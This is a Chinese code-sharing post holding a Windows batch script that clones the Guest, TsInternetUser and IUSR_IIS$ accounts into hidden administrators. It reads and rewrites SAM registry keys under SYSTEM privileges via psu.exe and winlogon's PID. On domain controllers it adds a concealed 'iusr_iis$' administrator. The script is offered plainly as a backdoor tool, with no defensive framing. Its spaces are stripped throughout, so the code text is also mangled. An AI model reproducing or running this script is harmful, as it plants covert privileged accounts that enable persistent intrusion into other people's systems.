复制代码 代码如下:

@echoguest.bat^<zpid^>^<password^>

@echo__________________________________________________________

@rem本guest.bat自动克隆guest为administrators组。

@rem如果存在username表示在终端登陆的环境运行bat.需要手工输入pid值。

@rem最好先手工修改密码。执行本程序两次。哈哈。主要是没有掩饰。regedit比较费时间。

@setzpath=%path%

@setzcd=%cd%

@setpath=%path%;%windir%;%windir%system32

:start

@netuserguest|find/i"*Domain"&&echoDomainController,Dontclone.ADDuser!&&gotoDOMAIN

@ifNOT"%USERNAME%"==""echousername=[%username%],term_loginmode.inputPID.&&gotoTerm

:start1

@pulist.exe|findstr.exe/i"WINLOGON.exe">a

@setx.exea-fa-a0,1>b

@FOR/F"eol=;tokens=1,2,3*delims=,"%%iin(b)do@setzpid=%%i

@gotoAUTO

:Term

@if"%1"==""gotoUSAGE

@ifNOT"%2"==""netuserguest%2

@ifNOT"%2"==""netuser|find/i"tsinternetuser">nul&&netusertsinternetuser%2

@setzpid=%1

:AUTO

@echoMakeadmg.regadmt.regadmiis.reg

@psu.exe-p"%windir%regedit.exe-eadmin.regHKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers00001F4"-i%zpid%>nul

@psu.exe-p"%windir%regedit.exe-ename.$$$HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames"-i%zpid%>nul

@echoWindowsRegistryEditorVersion5.00>admg.reg

@echoWindowsRegistryEditorVersion5.00>admt.reg

@echo[HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers00001F5]>>admg.reg

@echo[HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers00003e8]>>admt.reg

@typeadmin.reg>a&echo"Unicode-->>>ansi.find.exeuseitansi."&ifexistbdelb

@echo"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,>>b

@setx.exea-fa-a4,0|find",">>b

@setx.exea-fa-a5,0|find",">>b

@setx.exea-fa-a6,0|find",">>b

@typeb>>admg.reg

@typeb>>admt.reg

:IIS

@setzda=no

@echoiusr_iisexec

@typename.$$$>name.reg

@copyname.regname.txt>nul

@FOR/L%%iIN(5,3,30)DO@(setx.exea-fname.reg-a%%i,0|find/i"IUSR_IIS$"&&setzda=%%i)

@if"%zda%"=="no"gotoPSU

@rep.exe"IUSR_IIS$"name.txt/R/I>nul

@rep.exe"Editor"name.txt/R/I>nul

@find.exe/v/n""name.txt>n1

@findstr/I"%zda%"n1>name.iis

@setxa-fname.iis-a0,1-d()>zdc

@deln1

@delname.iis

@delname.$$$

@delname.txt

@dela

@delb

@For/F"tokens=1,2*delims="%%iin(zdc)do@(echo%%i>zdd)

@For/F"tokens=1,2*delims="%%iin(zdd)do@(setzdd=%%i)

@copyadmg.regadmiis.reg>nul

@echorep.exe"1f5""%zdd%"admiis.reg/I

@rep.exe"1f5""%zdd%"admiis.reg/I

@delzdc

@delzdd

:PSU

@attrib-s-radmg.bak>nul

@attrib-s-radmt.bak>nul

@copyadmg.bakadmg.reg>nul

@copyadmt.bakadmt.reg>nul

@psu.exe-p"%windir%regedit.exe-sadmg.reg"-i%zpid%>nul

@psu.exe-p"%windir%regedit.exe-sadmt.reg"-i%zpid%>nul

@ifNOT"%zda%"=="no"psu.exe-p"%windir%regedit.exe-sadmiis.reg"-i%zpid%>nul

@ifNOT"%zda%"=="no"netuseriusr_iis$/active:yes>nul

@ifNOT"%zda%"=="no"netuseriusr_iis$/active:no>nul

@copyadmg.regadmg.bak>nul

@copyadmt.regadmt.bak>nul

@attribadmg.bak+r+s>nul

@attribadmt.bak+r+s>nul

@netuserguest/active:yes>nul

@netuserguest/active:no>nul

@netuser|find/I"tsinternetuser"||gotoNEXT

@netusertsinternetuser/active:yes>nul

@netusertsinternetuser/active:no>nul

@ifexistadmin.regdeladmin.reg/f>nul

@ifexistadmg.regdeladmg.reg/f>nul

@ifexistadmt.regdeladmt.reg/f>nul

:Next

@gotoend

:DOMAIN

@remadduseriusr_iis$

@if"%2"==""echo"notinputguestofpassword"&&gotoEND

@netuser|find/i"iusr_iis">nul||netuseriusr_iis$%2/add

@netlocalgroupadministrators|find/i"iusr_iis$">nul||netlocalgroupadministratorsiusr_iis$/add

@gotoEND

:USAGE

@pulist.exe|findstr.exe/i"WINLOGONexplorer"

@echo"system.batzpid<password>"

@echo"NeedcurwinlogonPID,Term_mode，MustthisTerm_login_winlogon_pid."

@gotoend1

:END

@echo________ALLUserINadministrators:

@netlocalgroupadministrators

:END1

@echopsu.exe-p"%windir%regedit.exe-sadmiis.reg"-i%zpid%

@setpath=%zpath%

@setzpath=

@setzcd=

@setzda=

@setzdb=

@setzdd=

@setzpid=